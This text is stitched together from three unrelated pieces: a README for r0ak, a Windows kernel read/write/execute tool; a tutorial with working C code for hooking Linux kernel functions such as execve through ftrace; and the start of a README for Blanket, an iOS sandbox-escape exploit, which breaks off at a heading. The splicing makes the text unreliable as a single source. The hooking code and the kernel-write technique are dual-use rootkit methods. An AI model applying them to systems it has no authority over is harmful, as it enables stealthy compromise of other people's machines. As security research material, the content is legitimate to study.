
r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything other than Administrator privileges.

Quick Peek

r0ak v1.0.0 -- Ring 0 Army Knife
http://www.github.com/ionescu007/r0ak
Copyright (c) 2018 Alex Ionescu [@aionescu]
http://www.windows-internals.com

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]

Introduction

Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg) and the Sysinternals tools, or write their own. Unfortunately, using these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsolete, so a new approach is needed.

In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVEL once a font load is attempted and the comparator routine executes, receiving the named pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed Windows functionality is used, and all called functions are part of the KCFG bitmap, no security checks are violated, no debugging flags are required, and no poorly written 3rd-party drivers are needed.

FAQ

Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.

Usage

Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will look up your installation path automatically, and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT expert or other troubleshooter who apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.

Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Hooking Linux Kernel Functions: How to Hook Functions with Ftrace


Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team found a new way to use ftrace while trying to implement system activity monitoring that can block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher on the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is ftrace? Basically, it is a framework for tracing the kernel at the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, its effect on the system is negligible: the kernel knows where the mcount() or __fentry__() calls are located and replaces their machine code with nop (an instruction that does nothing) at an early stage. When Linux kernel tracing is turned on, the ftrace calls are patched back into the functions that need to be traced.

Description of necessary functions

The following structure can be used for describing each hooked function:

 

/**
 * struct ftrace_hook    describes the hooked function
 *
 * @name:                the name of the hooked function
 *
 * @function:            the address of the wrapper function that will be called instead
 *                       of the hooked function
 *
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 *
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 *
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
 */
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;
        unsigned long address;
        struct ftrace_ops ops;
};

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:

 

#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
        }
static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),
};

This is what the hooked function wrapper looks like:

/*
 * It’s a pointer to the original system call handler execve().
 * It can be called from the wrapper. It’s extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to “asmlinkage”).
 */
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);
/*
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
 */
static asmlinkage long fh_sys_execve (const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address (struct ftrace_hook *hook)
{
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        }
        *((unsigned long*) hook->original) = hook->address;
        return 0;
}

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

int fh_install_hook (struct ftrace_hook *hook)
{
        int err;
        err = resolve_hook_address(hook);
        if (err)
                return err;
        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;
        /* ... */
}

fh_ftrace_thunk() is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they tell ftrace to save and restore the processor registers, whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

 int fh_install_hook (struct ftrace_hook *hook)
{
        /* ... */
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        }
        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);
                /* Don’t forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
                return err;
        }
        return 0;
}

To turn off the hook, we repeat the same actions in reverse:

 void fh_remove_hook (struct ftrace_hook *hook)
{
        int err;
        err = unregister_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("unregister_ftrace_function() failed: %d\n", err);
        }
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
        }
}

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.
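
To see how these pieces fit together, here is a minimal module skeleton. It is only a sketch, assuming the fh_install_hook()/fh_remove_hook() helpers and the hooked_functions[] array shown above; fh_install_hooks()/fh_remove_hooks() are hypothetical batch helpers, not part of the article’s listings:

#include <linux/kernel.h>
#include <linux/module.h>

/* Hypothetical batch helpers built on top of fh_install_hook() and
 * fh_remove_hook() from the listings above. */
static int fh_install_hooks(struct ftrace_hook *hooks, size_t count)
{
        int err;
        size_t i;

        for (i = 0; i < count; i++) {
                err = fh_install_hook(&hooks[i]);
                if (err)
                        goto error;
        }
        return 0;

error:
        /* Roll back the hooks that were installed before the failure. */
        while (i != 0)
                fh_remove_hook(&hooks[--i]);
        return err;
}

static void fh_remove_hooks(struct ftrace_hook *hooks, size_t count)
{
        size_t i;

        for (i = 0; i < count; i++)
                fh_remove_hook(&hooks[i]);
}

static int __init fh_init(void)
{
        return fh_install_hooks(hooked_functions, ARRAY_SIZE(hooked_functions));
}

static void __exit fh_exit(void)
{
        fh_remove_hooks(hooked_functions, ARRAY_SIZE(hooked_functions));
}

module_init(fh_init);
module_exit(fh_exit);
MODULE_LICENSE("GPL");

The GPL declaration matters here: the ftrace registration functions are exported as GPL-only symbols, which is why the technique needs a loadable GPL module in the first place.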

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

 static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        regs->ip = (unsigned long) hook->function;
}

We get the address of struct ftrace_hook for our function using the container_of() macro and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.
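
For illustration, a small hypothetical helper called from the callback could carry the specifier like this (the helper itself is not from the article; only the notrace usage is the point):

#include <linux/module.h>

/* Marked notrace so this helper can never itself be patched by ftrace,
 * which avoids re-entering the tracer from inside our callback. */
static bool notrace fh_within_our_module(unsigned long addr)
{
        return within_module(addr, THIS_MODULE);
}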

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can perform this check by comparing parent_ip against the boundaries of our own module (the one containing the wrapper functions). However, this approach works only if the module doesn’t contain anything other than the wrappers that call the hooked functions. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;
}

This approach has three main advantages:

  • Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command ls in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through the system calls clone() and execve() respectively. Let’s say that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.


Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel quickly finishes the low-level work implemented in assembly and hands control over to the high-level do_syscall_64() function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In functions that don’t need to be traced, this call is replaced with the nop instruction. In the case of the sys_execve() function, however, no such replacement happens because we are tracing it, so the __fentry__() call remains in place.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Thanks to the FTRACE_OPS_FL_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next instruction to execute — which leads to passing control to a new address.
  7. The wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler, and it is our function that will eventually return control to do_syscall_64().
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.

Conclusion

Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. Several kernel features must be available for ftrace-based Linux kernel tracing and hooking to succeed:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead than kprobes. However, the overhead is still higher than for manual splicing: in effect, dynamic ftrace is a variation of splicing that also runs ftrace’s own bookkeeping code and any other registered callbacks, none of which we need.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead and can distort the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction), so the inner call basically jumps over ftrace.
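
One way that fix could look, sketched here as an assumption rather than quoted from the article’s code, is to resolve the symbol as before but store the original-function pointer shifted past the __fentry__ call site (MCOUNT_INSN_SIZE, 5 bytes on x86_64), so the inner call never re-enters ftrace and the parent_ip check becomes unnecessary:

#include <linux/errno.h>
#include <linux/ftrace.h>     /* brings in MCOUNT_INSN_SIZE via asm/ftrace.h */
#include <linux/kallsyms.h>
#include <linux/kernel.h>

static int fh_resolve_hook_address(struct ftrace_hook *hook)
{
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        }

        /* Point the saved "original" just past the __fentry__ call so that
         * calling it from the wrapper bypasses ftrace entirely. */
        *((unsigned long *) hook->original) = hook->address + MCOUNT_INSN_SIZE;
        return 0;
}

With this variant the ftrace callback can set regs->ip unconditionally, since ftrace only ever fires for the outer call.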

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:

  • CONFIG_FTRACE
  • CONFIG_KALLSYMS

Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:

  • CONFIG_DYNAMIC_FTRACE_WITH_REGS

To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.
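
If you want that constraint to surface at build time rather than as a silently non-working hook, a small guard along these lines can be added to the module (a sketch, not taken from the article):

#include <linux/version.h>

/* FTRACE_OPS_FL_IPMODIFY only exists since 3.19; fail the build on older
 * kernels instead of producing a hook that cannot redirect %rip. */
#if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0)
#error "ftrace-based hooking requires FTRACE_OPS_FL_IPMODIFY (kernel >= 3.19)"
#endif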

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:

  • CONFIG_HAVE_FENTRY

While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support a 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but it’ll significantly boost the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

According to our debugging, the system got stuck inside the hooked function: when the wrapper called the original function, the ftrace callback still saw parent_ip pointing into the kernel rather than into our wrapper. This launched an endless loop wherein ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;
}

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls expand to nothing. This printk-macro variant is used for logging at the development stage; since these logs are of no interest in production, they are simply compiled out unless you define the DEBUG macro. With the calls removed, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        return real_sys_execve(filename, argv, envp);
}

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace a function call instruction with a cheaper direct jump to the function’s body. This is what this call looks like in machine code:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax

The first CALL instruction is the exact same __fentry__() call that the compiler inserts at the beginning of all functions. But after that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve call (via a pointer stored in memory) performed by the CALL instruction, followed by a return from fh_sys_execve() via the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize("-fno-optimize-sibling-calls") (see the placement sketch below)
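
As a rough placement sketch (assuming all wrappers live together in one source file), the pragma goes at the top of that file, before any wrapper definition, so GCC keeps a real CALL, and therefore a return address inside our module, for every call to the original handler:

/* hooks.c -- hypothetical file that holds all of the wrapper functions.
 * The pragma must come before any wrapper definition so that GCC emits a
 * real CALL (and thus pushes a return address inside this module) for
 * every call to the original handler. */
#pragma GCC optimize("-fno-optimize-sibling-calls")

/* ... fh_sys_execve(), fh_sys_clone() and the other wrappers follow ... */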

For further hooking experiments, you can use the full kernel module code from GitHub.

Conclusion

While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allow entitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

